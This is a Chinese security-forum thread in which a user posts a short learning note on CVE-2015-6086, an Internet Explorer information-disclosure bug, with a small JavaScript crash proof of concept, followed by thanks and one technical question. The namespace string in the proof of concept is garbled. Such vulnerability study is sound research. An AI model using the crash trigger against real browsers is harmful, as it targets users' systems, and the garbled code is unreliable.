首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 二进制漏洞
    3. 发新帖
[原创]CVE-2015-6086 简要分析
发表于: 2016-4-27 14:42 7340

[原创]CVE-2015-6086 简要分析

qiaoguanli 活跃值
1
2016-4-27 14:42
7340

自己学习过程中写的记录。。。
前言

    Microsoft Internet Explorer 9 through 11 allows remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Internet Explorer Information Disclosure Vulnerability."

0x01 漏洞成因

测试环境:win7 x64   

IE10 10.0.9200.16521

漏洞crash POC如下

function trigger() {
    var polyLine = document.createElementNS('d0bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4M7K6i4K6u0W2L8%4u0Y4i4K6u0r3x3U0l9H3x3q4)9J5c8Y4y4$3k6#2)9J5y4#2)9J5b7H3`.`. 'polyline');
    polyLine.setAttributeNS(null, 'requiredFeatures', '\n');
}

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 3
支持
分享
最新回复 (9)
影子不寂寞
雪    币: 6
活跃值: (19)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
2
谢谢楼主分享
2016-4-28 00:51
0
地狱怪客
雪    币: 341
活跃值: (153)
能力值: ( LV7,RANK:110 )
在线值:
发帖
回帖
粉丝
私信
3
好厉害。
2016-4-28 10:26
0
StriveXjun
雪    币: 1044
活跃值: (1385)
能力值: ( LV3,RANK:35 )
在线值:
发帖
回帖
粉丝
私信
4
前排观摩!!
2016-4-28 14:22
0
Keoyo
雪    币: 292
活跃值: (850)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
私信
5
太感谢了!写的真的是太好了,最近就想看这样的文章!
2016-4-28 14:42
0
pregnant
雪    币: 68
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
windows cve
2016-4-28 16:46
0
音货得福
雪    币: 3837
活跃值: (2085)
能力值: ( LV5,RANK:70 )
在线值:
发帖
回帖
粉丝
私信
7
楼主你好,我测试的版本是IE 10.0.9200.17457,当执行CStr::Set函数的时候,由于src='\0abcd'之类的,这个\0会导致Set函数复制停止,导致出现%00%00%00%00..这种情况,不知道你的版本有这种情况么?
2016-5-19 15:33
0
qiaoguanli
雪    币: 44
活跃值: (34)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
私信
8
我没有测过这个版本的,建议你把dll反汇编进ida中看一下代码这个地方在17457版本下的实现。
2016-5-23 13:25
0
zEqueue
雪    币: 38
活跃值: (120)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
私信
9
mark
2016-9-2 16:05
0
kevinirst
雪    币: 2
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
10
顶顶!!!
2016-9-4 16:58
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回